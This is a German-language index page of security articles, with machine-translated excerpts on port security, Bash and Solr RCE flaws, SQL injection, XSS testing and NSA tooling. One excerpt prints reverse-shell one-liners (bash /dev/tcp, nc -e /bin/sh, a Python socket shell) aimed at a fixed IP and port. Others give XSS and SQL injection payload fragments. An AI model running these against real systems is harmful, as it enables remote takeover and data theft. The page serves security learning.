aktueller Standort:Heim > Technische Artikel > Betrieb und Instandhaltung > Sicherheit
- Richtung:
- alle web3.0 Backend-Entwicklung Web-Frontend Datenbank Betrieb und Instandhaltung Entwicklungswerkzeuge PHP-Framework tägliche Programmierung WeChat-Applet häufiges Problem andere Technik CMS-Tutorial Java System-Tutorial Computer-Tutorials Hardware-Tutorial Mobiles Tutorial Software-Tutorial Tutorial für Handyspiele
- Klassifizieren:
-
- Was ist die H3C-Portsicherheitstechnologie?
- Da sich das Internet heutzutage immer weiter entwickelt, ist Sicherheit ein Thema, dem Aufmerksamkeit geschenkt werden muss. Es gibt viele Verhaltensweisen, die Switch-Ports in Unternehmen gefährden, wie z. B. unbefugte Benutzer-Hosts, die sich zufällig mit dem Unternehmensnetzwerk verbinden. Wenn Mitarbeiter beispielsweise eigene Laptops besitzen, können sie ohne Zustimmung des Administrators das Netzwerkkabel eines bestimmten Hosts abziehen, es an den mitgebrachten Laptop anschließen und ihn dann mit dem Unternehmensnetzwerk verbinden. Es ist sehr wahrscheinlich, dass vertrauliche Informationen verloren gehen. Ein weiteres Beispiel ist die Installation von Hubs und anderen Netzwerkgeräten ohne Zustimmung. Um die Anzahl der Netzwerkterminals zu erhöhen, werden einige Mitarbeiter dies ohne Genehmigung tun. Schließen Sie Geräte wie Hubs und Switches an die Büronetzwerkschnittstelle an. In diesem Fall erhöht sich der Datenverkehr der Switch-Schnittstelle, die dieser Netzwerkschnittstelle entspricht.
- Sicherheit 1103 2023-05-19 12:46:46
-
- IPSec-Instanzanalyse basierend auf GRE
- IPSecoverGRE
- Sicherheit 998 2023-05-19 12:40:06
-
- Wie wird der kleine Test von xss durchgeführt?
- Es gibt keine Sicherheitseinschränkungen, verwenden Sie einfach warning(/xss/); Einschränkungen: Es kann nur CSS verwendet werden, HTML-Tags sind nicht zulässig, aber es kann nur unter IE getestet werden Führen Sie den folgenden Test bitte im IE6 aus. body{black;xss:alert(/xss/));/*Getestet unter IE6*/}Einschränkungen: HTML wird maskiert und das Image-Tag ist verfügbar. Die im Rahmen des Tests eingegebenen Zeichen werden in die Quelladresse eingefügt, was mithilfe eines Pseudoprotokolls umgangen werden kann. Geben Sie direkt warning(/xss/) ein, oder Sie können Ereignisse verwenden, um es zu umgehen, wie folgt: 1&quo
- Sicherheit 995 2023-05-19 11:37:06
-
- Beispielanalyse des erneuten Auftretens einer Bash-Schwachstelle
- BourneAgainShell (kurz BASH) ist die beliebteste SHELL-Implementierung unter GNU/Linux. Sie wurde 1980 geboren. Nach jahrzehntelanger Entwicklung hat sie sich von einem einfachen Terminal-Befehlszeileninterpreter zu einer multifunktionalen Schnittstelle entwickelt, die tief in das GNU-System integriert ist . . Bash, eine Art Unix-Shell. Die erste offizielle Version wurde 1989 veröffentlicht. Ursprünglich war die Verwendung auf dem GNU-Betriebssystem geplant, sie kann jedoch auf den meisten Unix-ähnlichen Betriebssystemen ausgeführt werden, einschließlich Linux und MacOSXv10.4, die es als Standard-Shell verwenden. Es wurde auch auf Cygwin und MinGW unter Microsoft Windows portiert oder kann unter MS- verwendet werden.
- Sicherheit 1292 2023-05-19 11:13:11
-
- Wie Zabbix Traceroute-Daten überwacht
- 1. Zabbixserver und Proxy installieren das mtrmtr-Skript und platzieren es im folgenden Pfad von zabbixserver und Proxy: Führen Sie chownzabbix:zabbixmtrtrace.shzabbix aus, um die mtrtrace-Vorlage zu erstellen: 5. Ordnen Sie den Host der Vorlage zu und beobachten Sie die Daten in zabbix: [Überwachung ]-[aktuelle Daten]:
- Sicherheit 930 2023-05-19 11:10:12
-
- Beispielanalyse der RCE-Schwachstelle durch Apache Solr-Velocity-Template-Injection
- 0x01 Einführung Solr ist ein unabhängiger Suchanwendungsserver auf Unternehmensebene, der eine API-Schnittstelle ähnlich einem Webdienst bereitstellt. Benutzer können XML-Dateien in einem bestimmten Format über HTTP-Anfragen an den Suchmaschinenserver senden, um Indizes zu generieren. Sie können auch Suchanfragen über HttpGet-Operationen stellen und Ergebnisse im XML-Format erhalten. 0x02 Sicherheitslücke Einführung Die VelocityResponseWriter-Komponente ist in Solr vorhanden. Ein Angreifer kann eine spezifische Anfrage zum Ändern der relevanten Konfiguration erstellen, sodass die VelocityResponseWriter-Komponente das Laden der angegebenen Vorlage ermöglicht, was wiederum dazu führt, dass die Velocity-Vorlage eine Sicherheitslücke bei der Remote-Befehlsausführung einfügt. Dies nutzt der Angreifer aus
- Sicherheit 999 2023-05-19 10:37:13
-
- Analyse eines Beispiels für die Nutzung der JIRA-Schwachstelle für den Zugriff auf das nicht klassifizierte Internet Protocol-Router-Netzwerk des US-Militärs
- Im Folgenden wird beschrieben, wie der Autor am öffentlichen Testprojekt „Hack the Pentagon“ der Schwachstelle des US-Verteidigungsministeriums (DoD) teilnahm und die JIRA-Schwachstelle CVE-2017-9506 nutzte, um eine SSRF-Angriffsoberfläche zu erstellen und Zugriff auf das nichtvertrauliche Internet des US-Militärs zu erhalten Protocol Router Network (NIPRnet) und in Kombination mit anderen Schwachstellentechniken wurden eine Reihe vertraulicher Informationen des DoD-Intranetsystems abgerufen. Aufgrund der Vertraulichkeit des Testprozesses und -inhalts geht dieser Artikel nur auf diesen Punkt ein, ohne zu viele technische Details und detaillierte Szenarien preiszugeben. Er dient nur zum Lernen und Teilen, und ich hoffe, dass die Leser Verständnis haben. JIRA ist ein hervorragendes Softwaretool zur Problemverfolgung und -verwaltung, das von der australischen Firma Atlassian entwickelt wurde. Es kann verschiedene Arten von Problemen verfolgen und verwalten.
- Sicherheit 1058 2023-05-18 22:29:09
-
- Welche Arten der SQL-Injection gibt es?
- Vorwort SQL-Injection-Angriffsmethoden können basierend auf der Anwendung, die den von der Datenbank zurückgegebenen Inhalt verarbeitet, in explizite Injektion, Fehlerinjektion und blinde Injektion unterteilt werden. Angreifer mit expliziter Injektion können den gewünschten Inhalt direkt aus dem aktuellen Schnittstelleninhalt abrufen. Das von der Fehlerinjektionsdatenbankabfrage zurückgegebene Ergebnis wird nicht auf der Seite angezeigt, aber die Anwendung druckt die Datenbankfehlerinformationen auf der Seite aus, sodass der Angreifer eine Datenbankfehleranweisung erstellen und den gewünschten Inhalt aus den Fehlerinformationen erhalten kann. Ergebnisse der Blind-Injection-Datenbankabfrage können nicht über die intuitive Seite abgerufen werden. Der Angreifer erhält den gewünschten Inhalt, indem er die Datenbanklogik verwendet oder die Ausführung der Datenbankbibliothek verzögert. Mysql manuelle Injektion kombinierte Injektion?id=1'orderby4--
- Sicherheit 2092 2023-05-18 22:05:12
-
- Was sind die Rebound-Schalen?
- 1.bash反弹bash-i>&/dev/tcp/ip_address/port0>&12.nc反弹nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.
- Sicherheit 2088 2023-05-18 22:01:04
-
- So verwenden Sie das neue APT-Framework DarkPulsar der NSA
- Vorwort Im März 2017 veröffentlichte ShadowBrokers ein vertrauliches Dokument, das die Welt schockierte und zwei Frameworks enthielt: DanderSpritz und FuzzBunch. DanderSpritz besteht vollständig aus Plugins und wird verwendet, um Informationen zu sammeln, Schwachstellen auszunutzen und übernommene Geräte zu manipulieren. Es ist in Java geschrieben und bietet eine grafische Oberfläche ähnlich dem Botnet-Verwaltungspanel und ein Control Panel ähnlich dem Metasploit-Tool. Es enthält auch Hintertüren und Plugins für nicht von FuzzBunch gesteuerte Geräte. Übersicht über die DanderSprit-Schnittstelle Fuzzbunch bietet ein Framework für die Interaktion und Zusammenarbeit verschiedener Dienstprogramme, einschließlich verschiedener Arten von Plug-Ins.
- Sicherheit 1301 2023-05-18 20:14:58
-
- So analysieren Sie die Schwachstelle der Ghostscript SAFER-Sandbox-Umgehung
- Vorwort Ghostscript ist eine Interpretersoftware für die Adobe PostScript-Sprache. Es kann in der PostScript-Sprache zeichnen und unterstützt die Konvertierung zwischen PS und PDF. Derzeit ist es standardmäßig in den meisten Linux-Distributionen installiert und wurde auf Unix, MacOS, Windows und andere Plattformen portiert. Ghostscript wird auch von Programmen wie ImagineMagic, PythonPIL und verschiedenen PDF-Readern verwendet. Beschreibung der Schwachstelle Am 21. August hat der Google-Sicherheitsforscher Tavis Ormandy mehrere GhostScript-Schwachstellen offengelegt, die durch die Erstellung bösartiger PostScript-Skripte in Bildern umgangen werden können
- Sicherheit 1440 2023-05-18 19:10:39
-
- DDCTF2019两个逆向分别是什么
- 01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"
- Sicherheit 1438 2023-05-18 17:13:20
-
- Analyse von Beispielen für die Umgehung von Beschränkungen und den Zugriff auf die internen Verwaltungssysteme von Google
- Als ich eines Tages nach Sicherheitslücken bei Google suchte, entdeckte ich einige IP-Adressen von Googles eigenen Diensten aufgrund öffentlicher Sicherheitslücken. Zuerst wusste ich wirklich nicht, was diese IP-Adressen bewirken könnten. Ich habe diese IP-Adressen zunächst überprüft und außerdem festgestellt, dass sie einige der internen IP-Adressen von Google enthielten. Mir fiel plötzlich ein, dass mein Freund KLSREERAM kürzlich eine Sicherheitslücke im Zusammenhang mit der internen IP von Google gemeldet hatte und ein anderer Freund Vishnu eine Sicherheitslücke gemeldet hatte, die Google-Subdomains für den Zugriff auf das Control Panel nutzte. Derzeit wurden beide Schwachstellen von Google behoben und auf die internen IP-Adressen im Zusammenhang mit diesen beiden Schwachstellen kann nicht über das Internet zugegriffen werden. Aber jetzt, da ich mehrere interne IP-Adressen von Google vor mir habe, muss ich einen Weg finden, herauszufinden, ob ich das kann
- Sicherheit 1097 2023-05-18 15:19:49
-
- So implementieren Sie eine Schwachstellenanalyse der Disk Pulse Enterprise Window-Anwendung
- 1. Einführung in die Sicherheitslücke DiskPulseEnterprise ist eine Software, die Festplattenänderungen überwacht. Sie kann die Software über einen Verwaltungsport 9120 oder ein Webverwaltungsfenster 80 verbinden und verwalten, um Festplattenänderungen zu überwachen. In DiskPulse Enterprise gibt es eine dynamische Linkbibliothek, die einige für HTTP-Vorgänge verantwortliche Funktionen enthält. Das Problem tritt bei der Verarbeitung der Postdaten auf, da es keine strikte Längenkontrolle für die Postdaten gibt Beim Ausführen der erfassten Daten werden Daten in den ungültigen Speicher kopiert, was zu einem Pufferüberlauf führt, eine SEH-Verarbeitung mit abnormalem Verhalten auslöst und schließlich EIP steuert, um beliebigen Code auszuführen. Software-Download-Link: h
- Sicherheit 1092 2023-05-18 15:04:07
-
- Was ist der Hauptgrund für den Absturz der APP?
- 1. Welche Art von Szenarien verursachen wahrscheinlich Abstürze? Kürzlich habe ich darüber nachgedacht, welche Art von Problemen wahrscheinlich zu Unfällen führen – also abnormales Denken. Ich habe zum Beispiel eine amerikanische Fernsehserie mit dem Titel „The Rookie“ gesehen " Erst vor zwei Tagen. „Polizei“, es gibt eine Szene, in der es dem Protagonisten John Nolan nicht gelingt, das Auto des Flüchtigen mit einem Polizeiauto anzuhalten, wodurch der Flüchtige entkommen kann. Welche Verbindung besteht zwischen dieser Szene und dem Test? Erstens vermeiden normale Menschen Kollisionen mit anderen, wenn sie auf der Straße fahren. Dies ist wie der Hauptprozess beim Testen einer Funktion, aber der Polizist wird alles tun, was nötig ist, um ihn zu fangen Bei allen Methoden handelt es sich um abnormales Denken während des Testprozesses, das Nachdenken darüber, wie die Funktion bedient werden soll, um die Verwendung zu erschweren. Leitfaden 1. Abnormale Vorgänge Verschiedene abnormale Vorgänge
- Sicherheit 2466 2023-05-18 13:55:06